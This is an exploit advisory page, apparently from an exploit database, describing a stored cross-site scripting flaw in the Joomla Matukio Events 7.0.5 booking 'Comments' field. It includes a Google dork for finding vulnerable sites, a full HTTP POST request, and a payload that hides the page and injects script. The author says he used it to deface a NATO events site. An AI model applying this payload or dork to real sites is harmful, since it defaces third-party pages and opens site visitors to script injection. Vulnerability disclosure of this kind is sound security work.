Joomla Matukio Events 7.0.5 Cross Site Scripting

2021.03.08
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title:Joomla Matukio Events 7.0.5 Stored XSS # Date:08.03.2021 # Author: Vincent666 ibn Winnie # Software Link: https://matukio.compojoom.com/ # Tested on: Windows 10 # Web Browser: Mozilla Firefox # My Youtube Channel : https://www.youtube.com/channel/UCZOWpC2dW9sipPq5z63C2rQ # Google Dorks: inurl:option=com_matukio PoC: I found simple , but interesting stored xss in Matukio Events. https://matukio.compojoom.com/events/event/81-science/979-rocket-science Press "Book Now": Field "Comments" vulnerable to XSS and html code injection. Put xss code and save this. It's works with different codes. The code I like for the test: https://pastebin.com/4V9sS7V3 Video: https://youtu.be/HlTEcDqNxSM Example on another site events.sto.nato.int https://www.youtube.com/watch?v=pBY2UskIuNU Host: matukio.compojoom.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------9492328303638924271813324098 Content-Length: 2816 Origin: https://matukio.compojoom.com Connection: keep-alive Referer: https://matukio.compojoom.com/events/book/979-rocket-science Cookie: d9122e5739e92113272e5173db43cd67=72qdv1oufsi2avknr7614genno; _ga=GA1.2.90714308.1615201744; _gid=GA1.2.178258541.1615201744 Upgrade-Insecure-Requests: 1 nrbooked=1&coupon_code=&field[3]=Mr&field[4]=&field[5]=azsxc&field[6]=ASD&field[8]=azsxc&field[9]=112233&field[10]=Zasx&field[11]=algeria&field[13]=vsdv@dklelw.de&field[14]=&field[15]=&field[16]=&field[17]=<style>body{visibility:hidden;}html{background: url(https://img5.goodfon.ru/wallpaper/nbig/6/5d/kholst-kraska-mazki-abstraktsiia-canvas-paint-brush-strokes.jpg) round;}</style><script>alert("Test XSS")</script>&agb=Yes&revoke=Yes&uuid=&task=book.book&semid=979&formId=1&61c98812f3351c5686829fce5947bf84=1 (p.s.: I don't publicly test the Joomla extensions anymore, but this time I posted it publicly because I did xss art on the NATO site in this component.)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top